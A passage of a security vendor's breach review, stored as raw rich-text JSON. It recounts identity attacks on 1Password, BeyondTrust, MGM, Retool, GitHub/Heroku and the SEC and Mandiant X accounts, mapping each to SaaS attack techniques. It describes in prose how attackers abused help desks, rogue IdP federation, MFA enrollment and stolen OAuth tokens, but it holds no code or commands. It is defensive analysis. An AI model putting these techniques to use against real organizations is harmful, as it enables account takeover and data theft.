services.",{"data":73300,"content":73301,"nodeType":860},{},[73302],{"data":73303,"marks":73304,"value":73306,"nodeType":864},{},[73305],{"type":899},"1Password — October 2023",{"data":73308,"content":73309,"nodeType":860},{},[73310],{"data":73311,"marks":73312,"value":73313,"nodeType":864},{},[],"1Password reported unsolicited activity in their Okta environment which was traced to a suspicious IP address. Later it was confirmed that an threat actor had accessed 1Password’s Okta environment using administrative privileges. They attempted to access the IT team member’s user dashboard, but that attempt was blocked by Okta. They also requested a report of administrative users, which was identified as suspicious and triggered an investigation. 1Password says it terminated the activity, investigated, and found no compromise of user data or other sensitive systems, either employee-facing or user-facing.",{"data":73315,"content":73316,"nodeType":860},{},[73317],{"data":73318,"marks":73319,"value":73321,"nodeType":864},{},[73320],{"type":899},"BeyondTrust - October 2023",{"data":73323,"content":73324,"nodeType":860},{},[73325],{"data":73326,"marks":73327,"value":73328,"nodeType":864},{},[],"BeyondTrust security teams detected an identity-centric attack on an in-house Okta administrator account. BeyondTrust blocked all access to the threat actor, and verified that they did not gain access to any systems. BeyondTrust has confirmed that there was no additional exposure to our internal systems or BeyondTrust’s customers.",{"data":73330,"content":73331,"nodeType":1005},{},[],{"data":73333,"content":73334,"nodeType":1009},{},[73335],{"data":73336,"marks":73337,"value":73338,"nodeType":864},{},[],"MGM Resorts — September 2023",{"data":73340,"content":73341,"nodeType":860},{},[73342],{"data":73343,"marks":73344,"value":73345,"nodeType":864},{},[],"The threat group known as Scattered Spider socially engineered MGM help desk personnel to grant ‘super admin’ access to the Okta tenant, which was then used to steal data and deploy ransomware, resulting in significant business disruption. ",{"data":73347,"content":73348,"nodeType":1312},{},[73349],{"data":73350,"marks":73351,"value":73352,"nodeType":864},{},[],"How did MGM get breached?",{"data":73354,"content":73355,"nodeType":941},{},[73356,73366,73376,73386,73396,73406],{"data":73357,"content":73358,"nodeType":945},{},[73359],{"data":73360,"content":73361,"nodeType":860},{},[73362],{"data":73363,"marks":73364,"value":73365,"nodeType":864},{},[],"Scattered Spider researched MGM employees on LinkedIn to identify individuals likely to have privileged Okta access, specifically Super Administrator privileges. ",{"data":73367,"content":73368,"nodeType":945},{},[73369],{"data":73370,"content":73371,"nodeType":860},{},[73372],{"data":73373,"marks":73374,"value":73375,"nodeType":864},{},[],"Scattered Spider contacted the IT help desk impersonating an employee with a privileged account asking for an authentication reset (password and MFA).",{"data":73377,"content":73378,"nodeType":945},{},[73379],{"data":73380,"content":73381,"nodeType":860},{},[73382],{"data":73383,"marks":73384,"value":73385,"nodeType":864},{},[],"With privileged access, the compromised Super Administrator accounts were used to assign higher privileges to other accounts, circumventing MFA by removing enrolled authenticators and/or removing MFA from authentication policies.",{"data":73387,"content":73388,"nodeType":945},{},[73389],{"data":73390,"content":73391,"nodeType":860},{},[73392],{"data":73393,"marks":73394,"value":73395,"nodeType":864},{},[],"Scattered Spider registered a second, attacker-controlled IdP via Org2Org using inbound federation, granting the ability to impersonate users and access applications on their behalf. By matching the username of target accounts in the second IdP to the original, the attacker was able to SSO into target applications. ",{"data":73397,"content":73398,"nodeType":945},{},[73399],{"data":73400,"content":73401,"nodeType":860},{},[73402],{"data":73403,"marks":73404,"value":73405,"nodeType":864},{},[],"Through inbound federation, Scattered Spider obtained global admin rights in Azure, effectively granting full control over connected systems and granting domain admin privileges in target environments.",{"data":73407,"content":73408,"nodeType":945},{},[73409],{"data":73410,"content":73411,"nodeType":860},{},[73412],{"data":73413,"marks":73414,"value":73415,"nodeType":864},{},[],"Scattered Spider deployed encryption software to around 100 ESXi servers and exfiltrated data, disrupting core business operations.",{"data":73417,"content":73418,"nodeType":1312},{},[73419],{"data":73420,"marks":73421,"value":73422,"nodeType":864},{},[],"What was the impact of the MGM breach?",{"data":73424,"content":73425,"nodeType":941},{},[73426,73436,73446],{"data":73427,"content":73428,"nodeType":945},{},[73429],{"data":73430,"content":73431,"nodeType":860},{},[73432],{"data":73433,"marks":73434,"value":73435,"nodeType":864},{},[],"Led to a 36-hour outage of multiple MGM IT systems and affected a number of its casinos on the Las Vegas strip, including the Bellagio, Excalibur, Luxor, Mandalay Bay and New York New York.",{"data":73437,"content":73438,"nodeType":945},{},[73439],{"data":73440,"content":73441,"nodeType":860},{},[73442],{"data":73443,"marks":73444,"value":73445,"nodeType":864},{},[],"Personal data compromise of an unspecified number of customers including various contact information, dates of births, genders, driver’s license numbers, social security numbers, and passport information. ",{"data":73447,"content":73448,"nodeType":945},{},[73449],{"data":73450,"content":73451,"nodeType":860},{},[73452],{"data":73453,"marks":73454,"value":73455,"nodeType":864},{},[],"MGM reported that the attack would cause a $100 million hit to its third-quarter results, including $10 million in one-time cyber security consulting fees. ",{"data":73457,"content":73458,"nodeType":1312},{},[73459],{"data":73460,"marks":73461,"value":73462,"nodeType":864},{},[],"What stands out in the MGM breach?",{"data":73464,"content":73465,"nodeType":941},{},[73466,73476,73486],{"data":73467,"content":73468,"nodeType":945},{},[73469],{"data":73470,"content":73471,"nodeType":860},{},[73472],{"data":73473,"marks":73474,"value":73475,"nodeType":864},{},[],"The MGM breach demonstrates how financially motivated organized criminal groups are specifically targeting the identity infrastructure of an organization (e.g. the chosen IdP solution) and leveraging cloud-native functionality. ",{"data":73477,"content":73478,"nodeType":945},{},[73479],{"data":73480,"content":73481,"nodeType":860},{},[73482],{"data":73483,"marks":73484,"value":73485,"nodeType":864},{},[],"The MGM breach is notable for being a hybrid attack that ended in what has become a typical “actions on objective” for ransomware operators and their affiliates - the propagation of malware and encryption of core business servers. In this way attackers are leveraging the newer functionality that cloud services provide them to target non-cloud/on-premise resources. This potentially indicates that attackers see cloud applications and services as the path of least resistance to achieving their goals, exploiting more limited security team visibility and understanding of these services compared to more traditional (now well protected) targets. ",{"data":73487,"content":73488,"nodeType":945},{},[73489],{"data":73490,"content":73491,"nodeType":860},{},[73492],{"data":73493,"marks":73494,"value":73495,"nodeType":864},{},[],"While attackers were focused on taking control of the cloud IdP, the initial access vector was notable for being a more traditional method (vishing) to bypass the need to acquire credentials (password and MFA token). This type of technique remains consistently effective, regardless of the technology landscape and whether MFA is correctly implemented or not.    ",{"data":73497,"content":73498,"nodeType":1312},{},[73499],{"data":73500,"marks":73501,"value":72211,"nodeType":864},{},[],{"data":73503,"content":73504,"nodeType":860},{},[73505],{"data":73506,"marks":73507,"value":72218,"nodeType":864},{},[],{"data":73509,"content":73510,"nodeType":4845},{},[73511,73550],{"data":73512,"content":73513,"nodeType":4581},{},[73514,73523,73532,73541],{"data":73515,"content":73516,"nodeType":7282},{},[73517],{"data":73518,"content":73519,"nodeType":860},{},[73520],{"data":73521,"marks":73522,"value":72234,"nodeType":864},{},[],{"data":73524,"content":73525,"nodeType":7282},{},[73526],{"data":73527,"content":73528,"nodeType":860},{},[73529],{"data":73530,"marks":73531,"value":72702,"nodeType":864},{},[],{"data":73533,"content":73534,"nodeType":7282},{},[73535],{"data":73536,"content":73537,"nodeType":860},{},[73538],{"data":73539,"marks":73540,"value":72254,"nodeType":864},{},[],{"data":73542,"content":73543,"nodeType":7282},{},[73544],{"data":73545,"content":73546,"nodeType":860},{},[73547],{"data":73548,"marks":73549,"value":72264,"nodeType":864},{},[],{"data":73551,"content":73552,"nodeType":4581},{},[73553,73573,73594,73604],{"data":73554,"content":73555,"nodeType":4569},{},[73556],{"data":73557,"content":73558,"nodeType":860},{},[73559,73562,73570],{"data":73560,"marks":73561,"value":21,"nodeType":864},{},[],{"data":73563,"content":73564,"nodeType":883},{"uri":19286},[73565],{"data":73566,"marks":73567,"value":73569,"nodeType":864},{},[73568],{"type":1455},"SAT1041",{"data":73571,"marks":73572,"value":21,"nodeType":864},{},[],{"data":73574,"content":73575,"nodeType":4569},{},[73576],{"data":73577,"content":73578,"nodeType":860},{},[73579,73582,73591],{"data":73580,"marks":73581,"value":21,"nodeType":864},{},[],{"data":73583,"content":73585,"nodeType":883},{"uri":73584},"https://pushsecurity.com/resources/browser-identity-attacks-matrix/inbound-federation",[73586],{"data":73587,"marks":73588,"value":73590,"nodeType":864},{},[73589],{"type":1455},"Inbound Federation",{"data":73592,"marks":73593,"value":21,"nodeType":864},{},[],{"data":73595,"content":73596,"nodeType":4569},{},[73597],{"data":73598,"content":73599,"nodeType":860},{},[73600],{"data":73601,"marks":73602,"value":73603,"nodeType":864},{},[],"Persistence; Lateral Movement",{"data":73605,"content":73606,"nodeType":4569},{},[73607],{"data":73608,"content":73609,"nodeType":860},{},[73610],{"data":73611,"marks":73612,"value":73613,"nodeType":864},{},[],"Inbound federation allows users to login to a target identity provider by authenticating with a source identity provider",{"data":73615,"content":73616,"nodeType":1005},{},[],{"data":73618,"content":73619,"nodeType":1009},{},[73620],{"data":73621,"marks":73622,"value":73623,"nodeType":864},{},[],"Retool — August 2023",{"data":73625,"content":73626,"nodeType":860},{},[73627],{"data":73628,"marks":73629,"value":73630,"nodeType":864},{},[],"Software development company Retool disclosed that the accounts of 27 of its cloud customers were compromised following a targeted SMS-based social engineering attack, which was enabled by Google Authenticator’s default synchronization of MFA tokens with the associated Google account.  ",{"data":73632,"content":73633,"nodeType":1312},{},[73634],{"data":73635,"marks":73636,"value":73637,"nodeType":864},{},[],"How did Retool get breached?",{"data":73639,"content":73640,"nodeType":941},{},[73641,73651,73661,73671,73681,73691],{"data":73642,"content":73643,"nodeType":945},{},[73644],{"data":73645,"content":73646,"nodeType":860},{},[73647],{"data":73648,"marks":73649,"value":73650,"nodeType":864},{},[],"The threat actor launched a targeted SMS-based phishing campaign against Retool employees with a custom lure relating to their workplace healthcare coverage.",{"data":73652,"content":73653,"nodeType":945},{},[73654],{"data":73655,"content":73656,"nodeType":860},{},[73657],{"data":73658,"marks":73659,"value":73660,"nodeType":864},{},[],"The timing coincided with a recently announced migration of logins to Okta, and the message contained a url disguised to look like their internal identity portal.",{"data":73662,"content":73663,"nodeType":945},{},[73664],{"data":73665,"content":73666,"nodeType":860},{},[73667],{"data":73668,"marks":73669,"value":73670,"nodeType":864},{},[],"After logging into the fake portal – which included an MFA form – the threat actor called the employee impersonating an IT team member, deepfaking the IT employee’s real voice and using real information about the company to build trust.",{"data":73672,"content":73673,"nodeType":945},{},[73674],{"data":73675,"content":73676,"nodeType":860},{},[73677],{"data":73678,"marks":73679,"value":73680,"nodeType":864},{},[],"The phished employee shared an MFA OTP token which allowed the threat actor to add their own personal device to the employee’s Okta account and enabled their own Okta MFA from that point forward.",{"data":73682,"content":73683,"nodeType":945},{},[73684],{"data":73685,"content":73686,"nodeType":860},{},[73687],{"data":73688,"marks":73689,"value":73690,"nodeType":864},{},[],"Due to the Google Authenticator synchronization feature that syncs MFA codes to the cloud by default, meaning that access to a Google account immediately gave access to all MFA tokens held within that account.",{"data":73692,"content":73693,"nodeType":945},{},[73694],{"data":73695,"content":73696,"nodeType":860},{},[73697],{"data":73698,"marks":73699,"value":73700,"nodeType":864},{},[],"This enabled the threat actor to take over a number of identities associated with a range of target apps and change the credentials.",{"data":73702,"content":73703,"nodeType":1312},{},[73704],{"data":73705,"marks":73706,"value":73707,"nodeType":864},{},[],"What was the impact of the Retool breach?",{"data":73709,"content":73710,"nodeType":941},{},[73711,73721,73731],{"data":73712,"content":73713,"nodeType":945},{},[73714],{"data":73715,"content":73716,"nodeType":860},{},[73717],{"data":73718,"marks":73719,"value":73720,"nodeType":864},{},[],"A total of 27 customers were impacted, with the threat actor specifically targeting customers in the Crypto industry.",{"data":73722,"content":73723,"nodeType":945},{},[73724],{"data":73725,"content":73726,"nodeType":860},{},[73727],{"data":73728,"marks":73729,"value":73730,"nodeType":864},{},[],"After taking over the accounts, the threat actor was observed gathering information and exploring the Retool apps.",{"data":73732,"content":73733,"nodeType":945},{},[73734],{"data":73735,"content":73736,"nodeType":860},{},[73737],{"data":73738,"marks":73739,"value":73740,"nodeType":864},{},[],"After learning of the attack, Retool revoked all internal authenticated sessions (Okta, GSuite, etc.) for employees, locked down access to the affected accounts, notified the affected customers, and restored their accounts to their original state.",{"data":73742,"content":73743,"nodeType":1312},{},[73744],{"data":73745,"marks":73746,"value":73747,"nodeType":864},{},[],"What stands out in the Retool breach?",{"data":73749,"content":73750,"nodeType":941},{},[73751,73761,73771],{"data":73752,"content":73753,"nodeType":945},{},[73754],{"data":73755,"content":73756,"nodeType":860},{},[73757],{"data":73758,"marks":73759,"value":73760,"nodeType":864},{},[],"Like the MGM breach, the Retool breach demonstrates how financially motivated organized criminal groups are specifically targeting the identity infrastructure of an organization (e.g. the chosen IdP solution) and leveraging cloud-native functionality. ",{"data":73762,"content":73763,"nodeType":945},{},[73764],{"data":73765,"content":73766,"nodeType":860},{},[73767],{"data":73768,"marks":73769,"value":73770,"nodeType":864},{},[],"A further similarity with the MGM breach, while attackers were focused on taking control of the cloud IdP, the initial access vector was notable for being a more traditional method (SMS phishing in this case) to bypass the need to acquire credentials (password and MFA token). This type of technique remains consistently effective, regardless of the technology landscape and whether MFA is correctly implemented or not.    ",{"data":73772,"content":73773,"nodeType":945},{},[73774],{"data":73775,"content":73776,"nodeType":860},{},[73777],{"data":73778,"marks":73779,"value":73780,"nodeType":864},{},[],"In this case, the attacker abused inherent weaknesses in Google Authenticator, which came under fire following the breach for its default synchronization of MFA codes to the cloud when connected to an account, in order to move laterally and compromise other target apps. ",{"data":73782,"content":73783,"nodeType":1312},{},[73784],{"data":73785,"marks":73786,"value":72211,"nodeType":864},{},[],{"data":73788,"content":73789,"nodeType":860},{},[73790],{"data":73791,"marks":73792,"value":72218,"nodeType":864},{},[],{"data":73794,"content":73795,"nodeType":4845},{},[73796,73835,73901],{"data":73797,"content":73798,"nodeType":4581},{},[73799,73808,73817,73826],{"data":73800,"content":73801,"nodeType":7282},{},[73802],{"data":73803,"content":73804,"nodeType":860},{},[73805],{"data":73806,"marks":73807,"value":72234,"nodeType":864},{},[],{"data":73809,"content":73810,"nodeType":7282},{},[73811],{"data":73812,"content":73813,"nodeType":860},{},[73814],{"data":73815,"marks":73816,"value":72702,"nodeType":864},{},[],{"data":73818,"content":73819,"nodeType":7282},{},[73820],{"data":73821,"content":73822,"nodeType":860},{},[73823],{"data":73824,"marks":73825,"value":72254,"nodeType":864},{},[],{"data":73827,"content":73828,"nodeType":7282},{},[73829],{"data":73830,"content":73831,"nodeType":860},{},[73832],{"data":73833,"marks":73834,"value":72264,"nodeType":864},{},[],{"data":73836,"content":73837,"nodeType":4581},{},[73838,73860,73882,73891],{"data":73839,"content":73840,"nodeType":4569},{},[73841],{"data":73842,"content":73843,"nodeType":860},{},[73844,73848,73857],{"data":73845,"marks":73846,"value":21,"nodeType":864},{},[73847],{"type":1455},{"data":73849,"content":73851,"nodeType":883},{"uri":73850},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/aitm_phishing/description.md",[73852],{"data":73853,"marks":73854,"value":73856,"nodeType":864},{},[73855],{"type":1455},"SAT1042",{"data":73858,"marks":73859,"value":21,"nodeType":864},{},[],{"data":73861,"content":73862,"nodeType":4569},{},[73863],{"data":73864,"content":73865,"nodeType":860},{},[73866,73870,73879],{"data":73867,"marks":73868,"value":21,"nodeType":864},{},[73869],{"type":1455},{"data":73871,"content":73873,"nodeType":883},{"uri":73872},"https://pushsecurity.com/resources/browser-identity-attacks-matrix/aitm-phishing",[73874],{"data":73875,"marks":73876,"value":73878,"nodeType":864},{},[73877],{"type":1455},"AiTM Phishing",{"data":73880,"marks":73881,"value":21,"nodeType":864},{},[],{"data":73883,"content":73884,"nodeType":4569},{},[73885],{"data":73886,"content":73887,"nodeType":860},{},[73888],{"data":73889,"marks":73890,"value":72773,"nodeType":864},{},[],{"data":73892,"content":73893,"nodeType":4569},{},[73894],{"data":73895,"content":73896,"nodeType":860},{},[73897],{"data":73898,"marks":73899,"value":73900,"nodeType":864},{},[],"Attacker-in-the-Middle (AiTM) phishing uses dedicated tooling to act as a web proxy between the victim and a legitimate login portal for an application the victim has access to, principally to make it easier to defeat MFA protection.",{"data":73902,"content":73903,"nodeType":4581},{},[73904,73925,73948,73958],{"data":73905,"content":73906,"nodeType":4569},{},[73907],{"data":73908,"content":73909,"nodeType":860},{},[73910,73913,73922],{"data":73911,"marks":73912,"value":21,"nodeType":864},{},[],{"data":73914,"content":73916,"nodeType":883},{"uri":73915},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/device_enrollment/description.md",[73917],{"data":73918,"marks":73919,"value":73921,"nodeType":864},{},[73920],{"type":1455},"SAT1043",{"data":73923,"marks":73924,"value":21,"nodeType":864},{},[],{"data":73926,"content":73927,"nodeType":4569},{},[73928],{"data":73929,"content":73930,"nodeType":860},{},[73931,73935,73944],{"data":73932,"marks":73933,"value":21,"nodeType":864},{},[73934],{"type":1455},{"data":73936,"content":73938,"nodeType":883},{"uri":73937},"https://pushsecurity.com/resources/browser-identity-attacks-matrix/device-enrollment",[73939],{"data":73940,"marks":73941,"value":73943,"nodeType":864},{},[73942],{"type":1455},"Device Enrollment",{"data":73945,"marks":73946,"value":21,"nodeType":864},{},[73947],{"type":1455},{"data":73949,"content":73950,"nodeType":4569},{},[73951],{"data":73952,"content":73953,"nodeType":860},{},[73954],{"data":73955,"marks":73956,"value":73957,"nodeType":864},{},[],"Initial Access; Persistence",{"data":73959,"content":73960,"nodeType":4569},{},[73961],{"data":73962,"content":73963,"nodeType":860},{},[73964],{"data":73965,"marks":73966,"value":73967,"nodeType":864},{},[],"Enrollment of a new MFA device in order to allow an adversary to complete MFA challenges for future authentication. ",{"data":73969,"content":73970,"nodeType":1005},{},[],{"data":73972,"content":73973,"nodeType":1009},{},[73974],{"data":73975,"marks":73976,"value":73977,"nodeType":864},{},[],"GitHub / Heroku / Travis-CI / npm — April 2022",{"data":73979,"content":73980,"nodeType":860},{},[73981],{"data":73982,"marks":73983,"value":73984,"nodeType":864},{},[],"An unknown threat actor used stolen OAuth user tokens (issued to Heroku and Travis-CI) to download data from private repositories. The threat actor then compromised an internal Heroku customer database as well as accessed and stole data from dozens of downstream organizations using Heroku and Travis-CI-maintained OAuth apps.",{"data":73986,"content":73987,"nodeType":1312},{},[73988],{"data":73989,"marks":73990,"value":73991,"nodeType":864},{},[],"How did they get breached?",{"data":73993,"content":73994,"nodeType":941},{},[73995,74005,74015,74025,74035,74045,74055],{"data":73996,"content":73997,"nodeType":945},{},[73998],{"data":73999,"content":74000,"nodeType":860},{},[74001],{"data":74002,"marks":74003,"value":74004,"nodeType":864},{},[],"The threat actor obtained access to two third-party OAuth integrators, Heroku and Travis-CI, accessing databases and downloading stored customer GitHub integration OAuth tokens. These tokens had earlier been used by Travis-CI and Heroku OAuth applications to integrate with GitHub to deploy applications.",{"data":74006,"content":74007,"nodeType":945},{},[74008],{"data":74009,"content":74010,"nodeType":860},{},[74011],{"data":74012,"marks":74013,"value":74014,"nodeType":864},{},[],"Access to the environment was gained by leveraging a compromised token for a Heroku machine account, but it is not disclosed how the threat actor achieved this. ",{"data":74016,"content":74017,"nodeType":945},{},[74018],{"data":74019,"content":74020,"nodeType":860},{},[74021],{"data":74022,"marks":74023,"value":74024,"nodeType":864},{},[],"The threat actor authenticated to the GitHub API using the stolen OAuth tokens issued to Heroku and Travis CI.",{"data":74026,"content":74027,"nodeType":945},{},[74028],{"data":74029,"content":74030,"nodeType":860},{},[74031],{"data":74032,"marks":74033,"value":74034,"nodeType":864},{},[],"For users who had the affected Heroku or Travis CI OAuth apps authorized in their GitHub accounts, the threat actor listed all the user's organizations.",{"data":74036,"content":74037,"nodeType":945},{},[74038],{"data":74039,"content":74040,"nodeType":860},{},[74041],{"data":74042,"marks":74043,"value":74044,"nodeType":864},{},[],"The threat actor then selected targets based on the listed organizations.",{"data":74046,"content":74047,"nodeType":945},{},[74048],{"data":74049,"content":74050,"nodeType":860},{},[74051],{"data":74052,"marks":74053,"value":74054,"nodeType":864},{},[],"The threat actor listed the private repositories for user accounts of interest and proceeded to clone private repositories of interest.",{"data":74056,"content":74057,"nodeType":945},{},[74058],{"data":74059,"content":74060,"nodeType":860},{},[74061],{"data":74062,"marks":74063,"value":74064,"nodeType":864},{},[],"GitHub identified unauthorized access to their npm production infrastructure using a compromised AWS API key, obtained by the threat actor when they downloaded a set of private npm repositories using a stolen OAuth token from one of the two affected third-party OAuth applications.",{"data":74066,"content":74067,"nodeType":1312},{},[74068],{"data":74069,"marks":74070,"value":74071,"nodeType":864},{},[],"What was the impact?",{"data":74073,"content":74074,"nodeType":941},{},[74075,74085,74095],{"data":74076,"content":74077,"nodeType":945},{},[74078],{"data":74079,"content":74080,"nodeType":860},{},[74081],{"data":74082,"marks":74083,"value":74084,"nodeType":864},{},[],"By stealing these OAuth tokens, the threat actor could access and download data from GitHub repositories belonging to those who authorized the compromised Heroku or Travis CI OAuth apps with their accounts. ",{"data":74086,"content":74087,"nodeType":945},{},[74088],{"data":74089,"content":74090,"nodeType":860},{},[74091],{"data":74092,"marks":74093,"value":74094,"nodeType":864},{},[],"The threat actor was able to mine the downloaded private repositories for secrets that could be used to pivot to other infrastructure, stealing data from dozens of organizations. ",{"data":74096,"content":74097,"nodeType":945},{},[74098],{"data":74099,"content":74100,"nodeType":860},{},[74101],{"data":74102,"marks":74103,"value":74104,"nodeType":864},{},[],"In addition to user repo’s downstream, the compromised token for a Heroku machine account obtained by threat actors also allowed unauthorized access into Heroku's internal database of customer accounts, enabling the threat actor to extract the hashed and salted passwords. ",{"data":74106,"content":74107,"nodeType":1312},{},[74108],{"data":74109,"marks":74110,"value":74111,"nodeType":864},{},[],"What stands out in the Github breach?",{"data":74113,"content":74114,"nodeType":941},{},[74115,74125,74135],{"data":74116,"content":74117,"nodeType":945},{},[74118],{"data":74119,"content":74120,"nodeType":860},{},[74121],{"data":74122,"marks":74123,"value":74124,"nodeType":864},{},[],"Similar to the Okta breach, this attack showcases the possibility of third-party supply chain attacks to target downstream organizations using cloud SaaS services. In this case, targeting OAuth integrators as opposed to IdP providers, but with a similar goal and impact of compromising the real target organizations downstream. ",{"data":74126,"content":74127,"nodeType":945},{},[74128],{"data":74129,"content":74130,"nodeType":860},{},[74131],{"data":74132,"marks":74133,"value":74134,"nodeType":864},{},[],"Applications like Github are an obvious target for attackers due to their widespread adoption. There have been numerous attacks leveraging Github as the vehicle for attacks by compromising repo’s to insert malicious code, or registering malicious copycat repo’s to dupe users into using them. ",{"data":74136,"content":74137,"nodeType":945},{},[74138],{"data":74139,"content":74140,"nodeType":860},{},[74141],{"data":74142,"marks":74143,"value":74144,"nodeType":864},{},[],"Unlike the attacks abusing the functionality of Github (repo poisoning) which target the legitimate developer processes when using the app, this attack could have been prevented at the identity layer before the attacker was able to breach the Heroku/Travis-CI accounts. ",{"data":74146,"content":74147,"nodeType":1312},{},[74148],{"data":74149,"marks":74150,"value":72211,"nodeType":864},{},[],{"data":74152,"content":74153,"nodeType":860},{},[74154],{"data":74155,"marks":74156,"value":72218,"nodeType":864},{},[],{"data":74158,"content":74159,"nodeType":4845},{},[74160,74199,74259,74322],{"data":74161,"content":74162,"nodeType":4581},{},[74163,74172,74181,74190],{"data":74164,"content":74165,"nodeType":7282},{},[74166],{"data":74167,"content":74168,"nodeType":860},{},[74169],{"data":74170,"marks":74171,"value":72234,"nodeType":864},{},[],{"data":74173,"content":74174,"nodeType":7282},{},[74175],{"data":74176,"content":74177,"nodeType":860},{},[74178],{"data":74179,"marks":74180,"value":72702,"nodeType":864},{},[],{"data":74182,"content":74183,"nodeType":7282},{},[74184],{"data":74185,"content":74186,"nodeType":860},{},[74187],{"data":74188,"marks":74189,"value":72254,"nodeType":864},{},[],{"data":74191,"content":74192,"nodeType":7282},{},[74193],{"data":74194,"content":74195,"nodeType":860},{},[74196],{"data":74197,"marks":74198,"value":72264,"nodeType":864},{},[],{"data":74200,"content":74201,"nodeType":4581},{},[74202,74221,74240,74250],{"data":74203,"content":74204,"nodeType":4569},{},[74205],{"data":74206,"content":74207,"nodeType":860},{},[74208,74211,74218],{"data":74209,"marks":74210,"value":21,"nodeType":864},{},[],{"data":74212,"content":74213,"nodeType":883},{"uri":61409},[74214],{"data":74215,"marks":74216,"value":72867,"nodeType":864},{},[74217],{"type":1455},{"data":74219,"marks":74220,"value":21,"nodeType":864},{},[],{"data":74222,"content":74223,"nodeType":4569},{},[74224],{"data":74225,"content":74226,"nodeType":860},{},[74227,74230,74237],{"data":74228,"marks":74229,"value":21,"nodeType":864},{},[],{"data":74231,"content":74232,"nodeType":883},{"uri":72882},[74233],{"data":74234,"marks":74235,"value":72888,"nodeType":864},{},[74236],{"type":1455},{"data":74238,"marks":74239,"value":21,"nodeType":864},{},[],{"data":74241,"content":74242,"nodeType":4569},{},[74243],{"data":74244,"content":74245,"nodeType":860},{},[74246],{"data":74247,"marks":74248,"value":74249,"nodeType":864},{},[],"Privilege Escalation; Lateral Movement",{"data":74251,"content":74252,"nodeType":4569},{},[74253],{"data":74254,"content":74255,"nodeType":860},{},[74256],{"data":74257,"marks":74258,"value":72911,"nodeType":864},{},[],{"data":74260,"content":74261,"nodeType":4581},{},[74262,74282,74302,74312],{"data":74263,"content":74264,"nodeType":4569},{},[74265],{"data":74266,"content":74267,"nodeType":860},{},[74268,74271,74279],{"data":74269,"marks":74270,"value":21,"nodeType":864},{},[],{"data":74272,"content":74273,"nodeType":883},{"uri":39734},[74274],{"data":74275,"marks":74276,"value":74278,"nodeType":864},{},[74277],{"type":1455},"SAT1004",{"data":74280,"marks":74281,"value":21,"nodeType":864},{},[],{"data":74283,"content":74284,"nodeType":4569},{},[74285],{"data":74286,"content":74287,"nodeType":860},{},[74288,74291,74299],{"data":74289,"marks":74290,"value":21,"nodeType":864},{},[],{"data":74292,"content":74294,"nodeType":883},{"uri":74293},"https://pushsecurity.com/resources/browser-identity-attacks-matrix/api-keys",[74295],{"data":74296,"marks":74297,"value":39740,"nodeType":864},{},[74298],{"type":1455},{"data":74300,"marks":74301,"value":21,"nodeType":864},{},[],{"data":74303,"content":74304,"nodeType":4569},{},[74305],{"data":74306,"content":74307,"nodeType":860},{},[74308],{"data":74309,"marks":74310,"value":74311,"nodeType":864},{},[],"Persistence; Defense Evasion",{"data":74313,"content":74314,"nodeType":4569},{},[74315],{"data":74316,"content":74317,"nodeType":860},{},[74318],{"data":74319,"marks":74320,"value":74321,"nodeType":864},{},[],"An adversary that has compromised an account could then read existing API keys from the app settings, if the app allows this, or create a new API key.",{"data":74323,"content":74324,"nodeType":4581},{},[74325,74346,74367,74377],{"data":74326,"content":74327,"nodeType":4569},{},[74328],{"data":74329,"content":74330,"nodeType":860},{},[74331,74334,74343],{"data":74332,"marks":74333,"value":21,"nodeType":864},{},[],{"data":74335,"content":74337,"nodeType":883},{"uri":74336},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/app_directory_lookup/description.md#app-directory-lookup",[74338],{"data":74339,"marks":74340,"value":74342,"nodeType":864},{},[74341],{"type":1455},"SAT1006",{"data":74344,"marks":74345,"value":21,"nodeType":864},{},[],{"data":74347,"content":74348,"nodeType":4569},{},[74349],{"data":74350,"content":74351,"nodeType":860},{},[74352,74355,74364],{"data":74353,"marks":74354,"value":21,"nodeType":864},{},[],{"data":74356,"content":74358,"nodeType":883},{"uri":74357},"https://pushsecurity.com/resources/browser-identity-attacks-matrix/app-directory-lookup",[74359],{"data":74360,"marks":74361,"value":74363,"nodeType":864},{},[74362],{"type":1455},"App directory lookup",{"data":74365,"marks":74366,"value":21,"nodeType":864},{},[],{"data":74368,"content":74369,"nodeType":4569},{},[74370],{"data":74371,"content":74372,"nodeType":860},{},[74373],{"data":74374,"marks":74375,"value":74376,"nodeType":864},{},[],"Discovery",{"data":74378,"content":74379,"nodeType":4569},{},[74380],{"data":74381,"content":74382,"nodeType":860},{},[74383],{"data":74384,"marks":74385,"value":74386,"nodeType":864},{},[],"An adversary who has gained a foothold via a SaaS app could download the list of users accessible to them in order to better target attacks against other users.",{"data":74388,"content":74389,"nodeType":1005},{},[],{"data":74391,"content":74392,"nodeType":1009},{},[74393],{"data":74394,"marks":74395,"value":74396,"nodeType":864},{},[],"Other notable attacks",{"data":74398,"content":74399,"nodeType":1312},{},[74400],{"data":74401,"marks":74402,"value":74403,"nodeType":864},{},[],"SEC X hack — January 2024",{"data":74405,"content":74406,"nodeType":860},{},[74407],{"data":74408,"marks":74409,"value":74410,"nodeType":864},{},[],"The X account for the U.S. Securities and Exchange Commission was victim to a SIM swapping attack, whereupon the attacker used the social media platform to issue a fake announcement on the approval of Bitcoin ETFs on security exchanges.",{"data":74412,"content":74413,"nodeType":860},{},[74414],{"data":74415,"marks":74416,"value":74417,"nodeType":864},{},[],"Once the threat actors controlled the number, they reset the password for the @SECGov account, and created the fake announcement. The SEC also confirmed that multi-factor authentication was not enabled on the account, as they had asked X support to disable it when they encountered problems logging into the account.",{"data":74419,"content":74420,"nodeType":1005},{},[],{"data":74422,"content":74423,"nodeType":1312},{},[74424],{"data":74425,"marks":74426,"value":74427,"nodeType":864},{},[],"Mandiant X hack — January 2024",{"data":74429,"content":74430,"nodeType":860},{},[74431],{"data":74432,"marks":74433,"value":74434,"nodeType":864},{},[],"The X account for Mandiant was hacked by a Drainer-as-a-Service (DaaS) gang in a brute force attack. MFA was not enabled on the account. The threat actor used the social media account to share links redirecting to a phishing page to steal cryptocurrency. ",{"data":74436,"content":74437,"nodeType":860},{},[74438],{"data":74439,"marks":74440,"value":74441,"nodeType":864},{},[],"The attacker used a wallet drainer dubbed CLINKSINK. This same drainer has been used since December to steal funds and tokens from users of Solana cryptocurrency as part of a large-scale campaign involving at least 35 affiliate IDs linked to a shared DaaS.",{"data":74443,"content":74444,"nodeType":1005},{},[],{"data":74446,"content":74447,"nodeType":1312},{},[74448],{"data":74449,"marks":74450,"value":74451,"nodeType":864},{},[],"23andMe data breach — April 